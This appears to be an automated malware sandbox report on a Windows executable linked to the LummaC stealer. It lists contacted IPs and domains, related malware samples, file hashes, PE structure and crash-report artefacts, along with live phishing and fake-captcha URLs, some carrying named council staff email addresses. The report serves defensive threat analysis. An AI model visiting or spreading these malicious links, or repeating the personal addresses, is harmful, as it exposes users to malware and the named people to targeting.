104.21.36.201 | skIYOAOzvU.exe | malicious | LummaC
185.166.143.50 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
185.166.143.50 | V7giEUv6Ee.bat | malicious | Unknown
185.166.143.50 | GdGXG0bnxH.exe | malicious | Unknown
185.166.143.50 | fIPSLgT0lO.exe | malicious | Remcos
185.166.143.50 | pPLwX9wSrD.exe | malicious | Remcos
185.166.143.50 | ozfqy8Ms6t.exe | malicious | Unknown
185.166.143.50 | 3XSXmrEOw7.exe | malicious | Unknown
185.166.143.50 | pPLwX9wSrD.exe | malicious | Unknown
185.166.143.50 | https://feji.us/m266he | malicious | Unknown
185.166.143.50 | lLNOwu1HG4.js | malicious | RHADAMANTHYS
Other samples that contacted the same domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
observerfry.lat | U8mbM8r793.exe | malicious | LummaC, Stealc | 172.67.199.72
observerfry.lat | ABnDy7rLFS.exe | malicious | LummaC, Stealc | 104.21.36.201
observerfry.lat | skIYOAOzvU.exe | malicious | LummaC | 104.21.36.201
bitbucket.org | 5RjjCWZAVv.exe | malicious | LummaC | 185.166.143.49
bitbucket.org | TmmiCE5Ulm.exe | malicious | LummaC | 185.166.143.49
bitbucket.org | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 185.166.143.48
bitbucket.org | EI3TafelpV.exe | malicious | LummaC | 185.166.143.49
bitbucket.org | F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 185.166.143.48
bitbucket.org | D.G Governor Istek,Docx.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 185.166.143.49
bitbucket.org | credit.js | malicious | PureLog Stealer, RHADAMANTHYS | 185.166.143.48
bitbucket.org | fGZLZhXIt1.bat | malicious | Unknown | 185.166.143.48
bitbucket.org | V7giEUv6Ee.bat | malicious | Unknown | 185.166.143.50
bitbucket.org | BwQ1ZjHbt3.bat | malicious | Unknown | 185.166.143.48
s3-w.us-east-1.amazonaws.com | 5RjjCWZAVv.exe | malicious | LummaC | 52.217.203.57
s3-w.us-east-1.amazonaws.com | TmmiCE5Ulm.exe | malicious | LummaC | 3.5.16.86
s3-w.us-east-1.amazonaws.com | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 16.182.37.145
s3-w.us-east-1.amazonaws.com | EI3TafelpV.exe | malicious | LummaC | 52.216.41.233
s3-w.us-east-1.amazonaws.com | https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.uk | malicious | Fake Captcha | 52.217.128.241
s3-w.us-east-1.amazonaws.com | https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.uk | malicious | Fake Captcha | 52.216.142.68
s3-w.us-east-1.amazonaws.com | https://preview.micrasoft-office365.com/f5c275dd184cbe62?l=6 | malicious | Unknown | 54.231.135.57
s3-w.us-east-1.amazonaws.com | F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 54.231.224.185
s3-w.us-east-1.amazonaws.com | D.G Governor Istek,Docx.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 52.217.32.148
s3-w.us-east-1.amazonaws.com | https://i.donotreply.biz/XWTZMVjBsbS9FS1Z2NzBoRzFZMy83RkoxVmlXaWlxaHo3VWFucmtuUGw1enh1ZWNEWVVSRmU5SURkU2psUnlGWUVLSzJtc3hJMVRZeXdZQTdKTVMwOTIySXc0dXRmSmkrKzVTSFFkRTlsZ0sycWdFdnhVY3BJNGx5ZnRmWTFhc0tuTTN1bVNUeUdFYkgrRW9rVllXdnIvNEE4aUgwNlR0R291UUxXUmY2L1JsVnZyNmMvbVpoUGJac04xckVKQlBXLS1PZFpzV3ByWmxpaEJybUhrLS1uMXVPRk5IWXlyNFBPNklpRkk0NTB3PT0=?cid=2330206445 | malicious | KnowBe4 | 3.5.25.98
Other samples that contacted the same ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
AMAZON-02 (US) | armv6l.elf | malicious | Unknown | 54.203.164.5
AMAZON-02 (US) | 5RjjCWZAVv.exe | malicious | LummaC | 52.217.203.57
AMAZON-02 (US) | TmmiCE5Ulm.exe | malicious | LummaC | 185.166.143.49
AMAZON-02 (US) | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 185.166.143.48
AMAZON-02 (US) | EI3TafelpV.exe | malicious | LummaC | 185.166.143.49
AMAZON-02 (US) | mips.elf | malicious | Unknown | 54.171.230.55
AMAZON-02 (US) | trZG6pItZj.exe | malicious | Vidar | 108.139.47.92
AMAZON-02 (US) | https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLw | malicious | Unknown | 65.9.112.70
AMAZON-02 (US) | https://staging.effimate.toyo.ai-powered-services.com/ | malicious | Unknown | 108.158.71.175
AMAZON-02 (US) | loligang.sh4.elf | malicious | Mirai | 64.252.106.176
AMAZON-02 (US), second entry | armv6l.elf | malicious | Unknown | 54.203.164.5
AMAZON-02 (US), second entry | 5RjjCWZAVv.exe | malicious | LummaC | 52.217.203.57
AMAZON-02 (US), second entry | TmmiCE5Ulm.exe | malicious | LummaC | 185.166.143.49
                                                                                                                                                                    uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                    EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 54.171.230.55
                                                                                                                                                                    trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                    • 108.139.47.92
                                                                                                                                                                    https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 65.9.112.70
                                                                                                                                                                    https://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 108.158.71.175
                                                                                                                                                                    loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 64.252.106.176
                                                                                                                                                                    CLOUDFLARENETUSU8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                    • 172.67.199.72
                                                                                                                                                                    ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                    pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                    xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                    schost.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    • 104.21.6.116
                                                                                                                                                                    5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                    s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                    TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.66.86
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context

Match: a0e9f5d64349fb13191bc781f81f42e1
OGBLsboKIF.exe (malicious; LummaC): 104.21.36.201, 185.166.143.50, 52.217.18.140
U8mbM8r793.exe (malicious; LummaC, Stealc): 104.21.36.201, 185.166.143.50, 52.217.18.140
ABnDy7rLFS.exe (malicious; LummaC, Stealc): 104.21.36.201, 185.166.143.50, 52.217.18.140
skIYOAOzvU.exe (malicious; LummaC): 104.21.36.201, 185.166.143.50, 52.217.18.140
NfwBtCx5PR.exe (malicious; LummaC): 104.21.36.201, 185.166.143.50, 52.217.18.140
spoolsv.COM.exe (malicious; DBatLoader): 104.21.36.201, 185.166.143.50, 52.217.18.140
pJRiqnTih0.exe (malicious; LummaC): 104.21.36.201, 185.166.143.50, 52.217.18.140
5XXofntDiN.exe (malicious; LummaC): 104.21.36.201, 185.166.143.50, 52.217.18.140
xxLuwS60RS.exe (malicious; LummaC): 104.21.36.201, 185.166.143.50, 52.217.18.140
schost.exe (malicious; LummaC Stealer): 104.21.36.201, 185.166.143.50, 52.217.18.140

No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.042952103108884
Encrypted: false
SSDEEP: 96:9CFTz5nbszcskMhroI7JfpQXIDcQvc6QcEVcw3cE/C36+HbHg/8BRTf3Oy1oVazN:0hGcH0BU/gjudxQfzuiFDZ24IO8e
MD5: 2CE7FFA406F51B94950CB258C58B8BEB
SHA1: 9900AEA81D59F0B6F70D19CE7E58A614B870BF17
SHA-256: 7E4B0DEBE436D44BB6279200DC96C72B49DADD9A7502EE54084E3738907F4E62
SHA-512: D49722D55069FB34A3A6A3BBB5D87418E01F89BEB138AA3A3809B3BFF3479016F1C76C7534C9F89C8C2DAD9558770C95736881E30E27567844B23DD42949FE80
Malicious: true
Reputation: low
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.1.1.0.7.7.5.3.0.2.5.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.1.1.0.7.8.2.0.2.1.5.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.7.e.9.5.9.5.-.5.3.9.2.-.4.2.f.4.-.8.c.4.9.-.9.6.8.3.2.a.4.d.1.a.9.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.7.9.0.b.5.4.-.3.9.9.2.-.4.5.e.a.-.b.c.2.0.-.a.9.1.a.8.9.8.3.4.d.e.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.h.6.f.S.6.q.f.T.E...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.2.0.-.0.0.0.1.-.0.0.1.3.-.8.0.6.f.-.6.d.d.a.0.8.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.e.f.c.6.7.8.d.b.0.3.0.9.6.7.7.c.8.2.0.0.4.6.4.d.d.f.8.8.7.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.4.4.6.8.6.6.c.c.f.a.5.1.b.2.e.7.f.8.d.3.7.d.6.d.7.0.3.e.d.6.6.0.b.a.4.0.8.d.f.0.!.Y.h.6.f.S.6.q.f.T.E...e.x.e.....T.a.r.g.e.t.A.p.p.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Mon Dec 23 07:04:37 2024, 0x1205a4 type
Category: dropped
Size (bytes): 283866
Entropy (8bit): 1.5107539918415762
Encrypted: false
SSDEEP: 768:T5iYgBB5ZqQx1zlwKVI00T+DFGrp2Ls18EOWR/wC:T5iYIrLqKWH+FSpGo8EOWRYC
MD5: CFADA3D439FA1E9FDB11305B9A010D63
SHA1: DAD2FFF2732EF966EA8B744796F036FFAD0FDBD3
SHA-256: A22A7A0BDE01422B85E9F6F2658E2418197964241B6A09DB8FE8867D1381F7A5
SHA-512: FBB11FAE186F04CE1698B9BC04A3EA90262B79413ECD44AA7998DF946BB5317FC7F50F96BE8820D0529822356858C74E7F62B5DBA638C2E698FE20AEF1DDF526
Malicious: false
Reputation: low
                                                                                                                                                                    Preview:MDMP..a..... .........ig....................................,....'......................`.......8...........T...........PL...............(...........*..............................................................................eJ......H+......GenuineIntel............T....... ...e.ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8382
Entropy (8bit): 3.7081590239983093
Encrypted: false
SSDEEP: 192:R6l7wVeJ2A6w6YW7SUK0JygmfNYprC89bDKsfWgBm:R6lXJ56w6YaSUKgmfN+DpfWb
MD5: 5757C10B458CBD5BC3FDBD300706A4F4
SHA1: 019EE156C39D11625FB45DAB7D5685DE50AFB462
SHA-256: 1A0551230DD0D705535B906B4B0ADC34D2C9931A7064EE07DCC36A0CD79E8A4E
SHA-512: 3F20BED29A312E8CA2705E6E562CFF9CF3F36CF6B30E3AF336EB5ACB19802D742F1D002438B214E68E4DF99CBC362823486A12B2B94859710C647204FD86A78D
Malicious: false
Reputation: low
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.0.0.<./.P.i.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4624
Entropy (8bit): 4.50912053200728
Encrypted: false
SSDEEP: 48:cvIwWl8zsnrJg77aI94LWpW8VYEYm8M4JhKcFatj+q8A6Sq90A2zUfd:uIjfnFI7+67VUJs/qz2zUfd
MD5: 4C12345AACEEE1A63469BAD0F8D62EC1
SHA1: 7FCBC62CF04EBBA499AD79829E184AB042B050C2
SHA-256: 4BF14ADA003B3B8A3207E7E26CA8CF5985601BFE5C6F27425976FEFB3FFADBF5
SHA-512: 13A9275DD1BCB2749B9CF86A7A5548AE17FFF4FB43CFB385257168C29174E9E9E4F13427AA395AF8E371DC4FD648F853487F502F2DE35D28D4F76C957DF4BA1D
Malicious: false
Reputation: low
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643567" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                    Entropy (8bit):4.296002406741097
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:741fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+yimBMZJh1VjE:01/YCW2AoQ0NisiwMHrVA
                                                                                                                                                                    MD5:50705802C345C76331B785EA4BB41255
                                                                                                                                                                    SHA1:238832A8E317E1211BD04599C54745FE3A816A8D
                                                                                                                                                                    SHA-256:B7C902B3705A2B1785E509325B549DA0185F04C43B5FFA4D280E5B3F416C758F
                                                                                                                                                                    SHA-512:000E47B4537696A28C15A4AF39F9239D494A8F3B70DDAD9CF2D861FA8A0D5E82CD05C4CB6D383108C8421447789E55BB5043817204B6243DCEAD5A00B81B33D9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....U..............................................................................................................................................................................................................................................................................................................................................D[..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Entropy (8bit):6.575118330905334
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:Yh6fS6qfTE.exe
                                                                                                                                                                    File size:2'968'064 bytes
                                                                                                                                                                    MD5:6cb8e80fe23740dff137816a6572a5ba
                                                                                                                                                                    SHA1:446866ccfa51b2e7f8d37d6d703ed660ba408df0
                                                                                                                                                                    SHA256:74d4a3a971e9d7cb7e2a9f3b3c01e7936075aa5c975ee83e54881f53ecff3379
                                                                                                                                                                    SHA512:bbecdfb692df1e64fee92a2c1873f9f7908fc247aad68aacde6d844bf338d947a63f8f7d625e9552d4bac682915ac7025207400eff9aa6937aca82928041719b
                                                                                                                                                                    SSDEEP:49152:J2Fnwq57CzAOFuNHPBvXB7ieIjqN4KeblFyaspcbHFwIT:J2Jwq57CzAOFuNH53VuDJoas+HT
                                                                                                                                                                    TLSH:79D55CD1F50972CBD8CA1A79A52BED825C5E47B4871088D3D86CA47FBEB3CC115BAC24
                                                                                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................. 0...........@..........................P0.......-...@.................................T0..h..
                                                                                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                                                                                    Entrypoint:0x702000
                                                                                                                                                                    Entrypoint Section:.taggant
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:6
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                    Instruction
                                                                                                                                                                    jmp 00007FD09CED675Ah
                                                                                                                                                                    movaps xmm5, dqword ptr [00000000h]
                                                                                                                                                                    add cl, ch
                                                                                                                                                                    add byte ptr [eax], ah
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity       File Type             Entropy               Characteristics
          0x1000           0x51000       0x24800   0cbe77588ec040c15edf7d07e7919edd  False     0.9973713077910958    data                  7.987571678988286     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc     0x52000          0x1000        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                     empty                 0.0                   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata    0x53000          0x1000        0x200     19a29171433eeef17e42fd663f137134  False     0.14453125            data                  0.9996515881509258    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
atqsxypq  0x54000          0x2ad000      0x2ac800  f0d4d42a2e10ea1fd394d61277587f80  unknown   unknown               unknown               unknown               IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
